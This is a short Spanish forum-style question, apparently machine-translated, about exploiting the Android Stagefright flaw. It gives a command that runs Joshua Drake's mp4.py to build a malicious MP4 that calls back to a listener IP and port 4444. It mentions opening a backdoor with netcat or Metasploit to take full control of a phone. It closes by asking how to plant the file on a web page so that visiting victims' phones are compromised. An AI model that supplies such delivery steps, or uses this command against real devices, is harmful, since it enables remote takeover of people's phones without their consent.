Últimamente he investigado mucho sobre Stagefright y se ha confirmado que muchos modelos de teléfonos que ejecutan Android Lollipop y menores son susceptibles a la explotación.
Entonces, dado que mi S3 sí se volvió vulnerable al exploit, usé Zimperium's La aplicación Stagefright Detector decidí probarlo.
Descargué el código del escenario de Joshua Drake ( mp4.py ) y logré crear el archivo MP4 malicioso ejecutándolo:
python mp4.py -c 192.168.x.x -p 4444
c para LAN IP
p para el número de puerto
Ahora, muchos tutoriales en línea dicen que antes de enviar el archivo MP4 a través de MMS al teléfono de destino, debo configurar una puerta trasera utilizando netcat. Sin embargo, he descubierto que crear una puerta trasera utilizando metasploit es mucho más efectivo para obtener el control total sobre el teléfono.
He oído que también puede incrustar el MP4 u otros archivos multimedia en una página web, de modo que cuando una víctima visita la página web, puede obtener el control total sobre el teléfono de la misma manera que se mencionó anteriormente.
Entonces, ¿cómo podría lograrse esto?